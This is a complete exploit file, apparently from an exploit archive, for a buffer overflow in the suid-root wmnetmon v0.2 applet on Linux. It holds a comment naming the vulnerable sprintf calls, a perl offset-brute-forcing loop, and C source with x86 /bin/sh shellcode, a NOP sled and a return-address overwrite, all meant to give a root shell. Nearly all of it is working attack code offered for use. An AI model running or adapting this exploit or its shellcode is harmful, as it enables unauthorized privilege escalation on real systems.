Wmnetmon v0.2 buffer overflow exploit for Linux - Provides a euid=0 shell provided /usr/X11R6/bin/wmnetmon is suid root, as it is by default. Includes perl script to try all offsets.
86bef23e564b83a03659996407371bf9b0c8902fe578e15b80db3ca10affd2eb
/* (linux+X11)wmnetmon[v0.2+] buffer overflow, by v9[v9@fakehalo.org]. this
will give you a euid=0 shell for the /usr/X11R6/bin/wmnetmon application.
/usr/X11R6/bin/wmnetmon is a monitor for X(a common windowmaker applet),
which is required to be SUID(=4755) root by install.
note: try offsets around -300. you will need to set your DISPLAY env var
correctly for this to evaluate locally(logged in). also, you will notice
wmnetmon say "file not found." when attempting to exploit it, it doesn't
overflow at that point, so don't think it's not vulnerable when it is. :)
test: this was tested on wmnetmon[v0.2p3] in linux. (v0.2+ will work)
this blatant overflow is caused by this(configfile.c):
char configfile[128];
...
sprintf(configfile,"%s",fname);
i also found this while looking at the source, but there is no need to make
two exploits that do the same thing:
char configfile[128];
...
char *homedir=getenv("HOME");
...
sprintf(configfile,"%s/.wmnetmonrc",homedir);
here is the traditional perl script to run offsets (until ctrl-c):
#!/usr/bin/perl
$i=$ARGV[0];
while(1){
print "offset: $i.\n";
system("./wmnetmon_bof $i");
$i+=10; # match the value with the number of no operations if you want.
} */
#define PATH "/usr/X11R6/bin/wmnetmon" // maybe the admin installed elsewhere?
#define DEFAULT_OFFSET -300 // just to make it easy for you. (g)
static char exec[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68\x01"; // i like hex01.
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[142]; // not exact, but who's counting?
int i,offset;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
for(i=0;i<136;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(132-strlen(exec));i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
printf("[ return address: 0x%lx(offset=%d), total size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
if(execlp(PATH,"wmnetmon","-c",bof,0)){
printf("%s: execution failed, maybe %s doesn't exist?\n",argv[0],PATH);
exit(-1);
}
}